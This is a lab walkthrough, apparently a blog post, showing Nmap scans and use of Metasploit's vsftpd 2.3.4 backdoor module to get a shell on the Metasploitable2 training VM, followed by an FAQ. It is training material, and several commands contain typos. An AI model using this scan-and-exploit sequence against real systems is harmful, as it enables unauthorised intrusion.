Exploiting Metasploitable2: Nmap + Metasploit Guide

This hands-on cybersecurity lab demonstratation shows attackers combine reconnaissance and exploitation techniques using Nmap and Metasploit. The setup involves two machines: a Kali Linux attacker system equipped with penetration testing tools and a vulnerable target host (such as Metasploitable). The goal is to simulate a real-world penetration test, starting from target discovery to successful exploitation and session management.

The lab begins by verifying basic connectivity between both systems using ifconfig and ping commands. Once communication is confirmed, the attacker leverages Nmap to perform host discovery, identify open ports, and enumerate services running on the target. With detailed service information, potential vulnerabilities can be mapped to known exploits.

Next, the attacker launches Metasploit Framework (msfconsole) to load an exploit module corresponding to the vulnerable service discovered during scanning. Critical parameters such as the target IP address and service port are configured before executing the exploit. If successful, Metasploit establishes a session, often a Meterpreter shell, which allows the attacker to interact with and control the compromised system.

This exercise illustrates the importance of proactive defense, patching, and monitoring, while providing learners with practical exposure to offensive security methodologies in a safe, controlled environment.

Lab Setup & Tools Used:

Attacker PC (Kali)

Metasploit

Tools Used

Nmap 

Check Connectivity Ping From both sides.

#ifconfig(Metasploit)

#ping 192.168.142.128 (kali from Metasploit)

#ifconfig (kali)

#pin 192.168.142.130 (Metasploit on kali)

From the above exercise we have understand that he successful connection has been created. Now open nmap on kali terminal and check the version of nmap is it latest and upgraded? #nmap –version.

Yes, Nmap 7.94 is an upgraded version. It was released with several significant improvements and new features, including a migration of Zenmap and Ndiff to Python 3, enhanced OS fingerprint matching, and various library upgrades. The latest version is actually Nmap 7.96, which further builds upon these enhancements with even more performance improvements and new scripts.

NMAP SCAN ENTIRE LOCAL NETWORK

Command used

#nmap -Sv -p 21 192.168.142.130 (metasploitable)

To scan port 21 (commonly used for FTP - File Transfer Protocol) on a target system and detect the version of the service running on that port.

The above command is used to scan the Metasploitable target machine on IP 192.168.142.130, specifically focusing on port 21, which is the default port for FTP (File Transfer Protocol).

• The -sV option enables service version detection, which goes beyond simply identifying whether the port is open. It attempts to determine the exact version of the service running, such as vsftpd 2.3.4.
• The -p 21 option instructs Nmap to scan only port 21/tcp instead of scanning a full port range. This makes the scan faster and more targeted. The IP 192.168.142.130 points to the vulnerable Metasploitable machine within the lab environment.

Detect open ports

# nmap -A 21 192.168.142.130

By using the above command we can perform an aggressive scan on the target machine (192.168.142.130, Metasploitable), focusing only on port 21 (FTP).

-A → Enables aggressive scanning mode, which combines multiple Nmap features:

• Service version detection (like -sV)
• Operating system detection
• Default Nmap NSE scripts for vulnerability and service probing
• Traceroute information

-p 21 → Restricts the scan to port 21/tcp, which is the default FTP service port.

When executed, this scan not only checks whether FTP is open but also attempts to identify:

• The exact FTP software and version (e.g., vsftpd 2.3.4).
• Potential security warnings or misconfigurations.
• The operating system running on the target host.
• Additional service details using built-in Nmap scripts

Perform an aggressive scan

#nmap -A – oA  report 192.168.142.130

This command not only gathers comprehensive reconnaissance data (open ports, running services, service versions, OS details, and potential vulnerabilities) but also saves the scan in multiple formats. This is essential for penetration testers who need to:

 Document findings in reports.

 Parse results for automation or integration into other tools.

Maintain an audit trail of scans conducted.

This will:

Save results as:

report.nmap (normal)

report.xml (XML)                                                                                                 

report.gnmap (grepable)

NEXT STEP EXPLOITATION

Start msfconsole

 # search ftp

it will shows all the exploit results almost 500

next

#search vsftpd 

    We are interested in backdoor

So,

# msf6> use 1

Show Options

Set port and host

#exploit

Result:

1-Established connection between kali linux and metasploitable

2- Ping for verification

3- Check nmap –version for verification

4- Up to date

5- Perform an aggressive scan

6- With the help of msfconsole

7- Exploited metasploitable Accessed shell

Conclusion: This lab illustrates the complete life cycleof a penetration test in a controlled environment using two widely adopted tools: Nmap and Metasploit. The exercise begins with establishing basic connectivity between the attacker machine (Kali Linux) and the vulnerable target (Metasploitable), ensuring that the network setup is correct through IP verification and ping testing.

Once communication is confirmed, the attacker employs Nmap for reconnaissance. Nmap is first checked for availability, then used to conduct an aggressive scan, revealing open ports, running services, and system fingerprints. In this case, the scan identifies vulnerable services such as FTP (vsftpd 2.3.4), which is known to contain a backdoor vulnerability. This reconnaissance stage is crucial as it transforms raw network data into actionable intelligence for exploitation.

The next phase involves launching MetasploitFramework (msfconsole), a powerful exploitation toolkit. By selecting the appropriate exploit module (vsftpd_234_backdoor) and configuring target details, the attacker successfully compromises the system. Metasploit establishes a session, enabling the attacker to gain remote shell access. From here, system-level commands such as whoami or uname -a can be executed, confirming full control of the victim system.

Overall, the lab demonstrates the workflow ofdiscovery → vulnerability identification → exploitation → post-exploitation. It highlights the importance of regular patching, vulnerability management, and monitoring to prevent attackers from leveraging outdated services and known exploits to gain unauthorized access.

FAQs

1. What is Metasploitable2 and why is it used in penetration testing?

Metasploitable 2 is an intentionally vulnerable virtual machine designed for cybersecurity training. It allows ethical hackers and students to practice vulnerability scanning, exploitation, and privilege escalation in a safe lab environment. Nmap and Metasploit Framework are commonly used tools for discovering and exploiting its vulnerabilities. 

2. Why is Nmap used before exploiting Metasploitable2?

Nmap is used to perform reconnaissance and identify open ports, running services, and software versions on the target system. This information helps penetration testers determine which vulnerabilities and exploits may work against the system. 

3. What vulnerabilities can be discovered on Metasploitable2 using Nmap?

A typical Nmap scan reveals multiple vulnerable services such as FTP (vsftpd), Telnet, SMTP, Apache web server, MySQL, and Samba. Many of these services are outdated or misconfigured, making them easy targets for exploitation during security testing. 

4. What are the most common exploits in Metasploitable2?

Some of the most commonly exploited vulnerabilities include the vsftpd 2.3.4 backdoor, Samba remote code execution, UnrealIRCd backdoor, and vulnerable web applications hosted on the Apache server. These vulnerabilities allow attackers to gain remote access or execute commands on the system. 

5. Which Nmap command is commonly used to scan Metasploitable2?

A widely used command is:

nmap -sV -A <target-ip>

This command performs service version detection, operating system detection, and script scanning to gather detailed information about the target system.

6. Is it safe to practice exploitation on Metasploitable2?

Yes, Metasploitable2 is specifically created for cybersecurity training and ethical hacking practice. However, it should always be used in an isolated lab environment (such as VirtualBox or VMware) and never exposed to the public internet.